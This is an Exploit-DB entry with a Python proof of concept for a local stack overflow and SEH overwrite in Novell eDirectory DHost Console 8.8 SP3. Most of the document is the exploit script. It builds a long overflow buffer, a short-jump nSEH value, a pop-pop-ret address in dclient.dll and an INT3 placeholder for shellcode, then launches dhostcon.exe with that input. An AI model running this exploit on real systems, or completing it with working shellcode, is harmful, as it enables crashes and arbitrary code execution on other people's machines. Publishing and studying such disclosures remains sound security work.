Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)

EDB-ID:

15267

CVE:

N/A


Author:

d0lc3

Type:

dos


Platform:

Windows

Date:

2010-10-17


# Exploit Title: 	Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date: 		17/10/2010 
# Author: 		d0lc3	 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: 	http://www.novell.com/
# Version: 		8.8 SP3 (20216.67)]
# Tested on: 		win32 xp sp3 (spa)

#Summary:
#	DHostCon.exe is prone to local denial of service caused by stack overflow
#	triggered if user-supplied parameters are too long (1074 bytes).
#	Due nature of this vulnerabilty, attackers could exploit this issue
#	to execute arbitrary code on local host.

#PoC:

#!/usr/bin/python
import os,struct

def main():
	path="C:\Novell\NDS\dhostcon.exe"	
	args="x.x.x.x"				#ip server
	buf="A"*1065
	nseh=struct.pack("<L",0x90909eeb)	#jmp short 0012ff50 +NOP + NOP
	seh=struct.pack("<L",0x61012c20)	#PPR dclient.dll
	
	shellcode=struct.pack("<B",0xCC)	#INT3

	crash=buf+shellcode+nseh+seh

	os.system(path+" "+args+" "+crash)	#Crash!

if __name__=="__main__":
	main()